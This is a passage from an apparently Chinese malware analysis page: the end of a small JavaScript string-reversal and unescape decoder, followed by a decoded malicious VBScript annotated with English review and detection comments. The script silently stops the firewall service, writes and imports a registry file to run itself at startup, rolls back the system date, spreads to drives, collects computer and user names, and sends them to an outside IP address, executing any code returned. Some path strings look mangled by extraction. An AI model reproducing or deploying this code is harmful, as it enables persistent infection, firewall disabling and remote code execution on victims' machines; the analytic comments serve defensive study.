with(document){
if(rev.order.checked){
revedstr = rev.instr.value.split('').reverse().join('')
write("<strong>reversed string:</strong>",revedstr,"<br>");
write("<strong>unescape string:</strong>",unescape(revedstr),"<br>");
write("<strong>escape string:</strong>",escape(revedstr),"<br>");
}
else{
unescapstr = unescape(rev.instr.value);
revedstr = unescapstr.split('').reverse().join('');
write("<strong>uneacape string:</strong>",unescapstr,"<br/>");
write("<strong>reversed string:</strong>",revedstr);
}
}
}
</script>
</head>
<body>
<form action="" method="post" name="rev">
<input name="order" type="checkbox" value="" />转换顺序(先求反后解码)?<br />
<input name="instr" type="text" value="请在这里输入" onmousemove="this.select()"/>
<input name="" type="button" value="转换" onclick="_reverse()"/></form>
</body>
</html>
使用以上的工具对代码进行解码后代码如下:
' Decoded listing of a malicious VBScript, reproduced exactly as printed on the page.
' This opening section suppresses errors, stops the SharedAccess service, reads the
' script's own source text, and registers a machine startup script by importing a
' temporary .reg file that is deleted afterwards.
' NOTE(review): path separators appear to be missing from the string literals below
' (sysdir&"sysinfo.reg", the registry key names, the %windir% path) - most likely lost
' when the page was extracted. Confirm against the raw sample before using any of
' these strings as indicators.

' From here on every runtime error is ignored, so a failed step leaves no visible trace.
On Error Resume Next
Set fso=CreateObject("scripting.filesystemobject")
' NOTE(review): as printed, strreverse() would turn this literal into an invalid ProgID;
' presumably the obfuscated original stored the string reversed and the decoding tool
' flipped it - confirm against the raw sample.
Set wshshell=CreateObject(strreverse("wscript.shell"))
Dim dri_list,dri_list0
Dim issend
' issend gates the HTTP request made later in the script; it is set to 1 after a send
' that raised no error.
issend=0
' Current system date, kept so the script can restore the date after changing it further down.
c_time=Date()
' Stops the SharedAccess service (Internet Connection Sharing and the firewall service).
' The second argument 0 runs the command in a hidden window.
' Detection: a script host (wscript/cscript) spawning "net stop sharedaccess".
wshshell.run "net stop sharedaccess",0
Set drvs=fso.drives
' Special folder 1 is the system folder (see the constant list in the trailing comment).
sysdir=fso.GetSpecialFolder(1) 'WindowsFolder=0,SystemFolder=1, TemporaryFolder=2
' Full path of the currently running script file.
thispath=wscript.ScriptFullName
' Open the script's own file read-only and load its entire text into scopy.
' Where scopy is used is not visible in this excerpt.
Set fc=fso.OpenTextFile(thispath,1) 'ForReading=1,ForWriting=2 ,ForAppending=8
scopy=fc.readall
fc.Close
Set fc=Nothing
' Write the registry file sysinfo.reg, which registers the virus to run automatically
' at system startup. writefile is a helper defined elsewhere in the script (not shown).
' Both key names end in "scriptsstartup" and sit under the policies / group policy
' branches of HKLM, so they look like the Group Policy machine startup-script keys;
' each entry points "script" at prncfg.vbs under %windir%, system32.
' Detection: unexpected values under those startup-script keys, and a prncfg.vbs file
' in the system directory (the name resembles the legitimate prncnfg.vbs printing script).
Call writefile(sysdir&"sysinfo.reg","windows registry editor version 5.00 [hkey_local_machinesoftwarepoliciesmicrosoftwindowssystemscriptsstartup ] "script"="%windir%system32prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 [hkey_local_machinesoftwaremicrosoftwindowscurrentversiongroup policystatemachinescriptsstartup ] "script"="%windir%system32prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
")
' Import sysinfo.reg into the registry. /s suppresses regedit's confirmation dialogs
' and 0 hides the window. The file name is relative here, while the file was written
' using sysdir - presumably this relies on the working directory; verify.
wshshell.run "regedit /s sysinfo.reg",0
' Short pause (200 ms), presumably to let regedit finish before the file is removed.
wscript.sleep 200
' Delete the .reg file; True forces deletion even if it is read-only, so the dropped
' file does not remain on disk.
fso.deletefile sysdir&"sysinfo.reg",True
' 如果当前运行脚本在系统目录中
If InStr(thispath,sysdir)>0 Then
dri_list0=listdrv()
o_time=left(c_time,3)&cstr(Int(Mid(c_time,4,1))-1)&Right(c_time,Len(c_time)-4) '回拨时间1年
wshshell.run "cmd /c Date "&o_time,0
wscript.sleep 10000
For dri_i=1 to Len(dri_list0)
Call writeauto(Mid(dri_list0,dri_i,1)&":")
Next
wshshell.run "cmd /c Date "&c_time,0
' WMI应用查询计算机名,用户名
computername="":username=""
Set objwmiservice=GetObject("winmgmts:{impersonationlevel=impersonate}!.rootcimv2")
Set colcomputers = objwmiservice.execquery("select * from win32_computersystem")
For Each objcomputer in colcomputers
computername=objcomputer.name
username=objcomputer.username
Next
If username="" Then username="evar"
If InStr(username,"")<=0 Then
username=computername&""&username
End If
do
If issend=0 Then
' 链接外网,获得执行代码
Set xml=CreateObject("msxml2.serverxmlhttp")
xml.open "get","http://202.119.104.100/zzb/eva/count.asp?a="&username,0
' http://202.119.104.100/zzb/是南师大学校党委组织部主办的网站
xml.setrequestheader "user-agent","evar"
xml.send()
If Err.number=0 Then
issend=1
res=xml.responsetext
If ucase(left(res,7))=ucase("Execute") Then Execute res
Else
Err.clear
End If
Set xml=Nothing
End If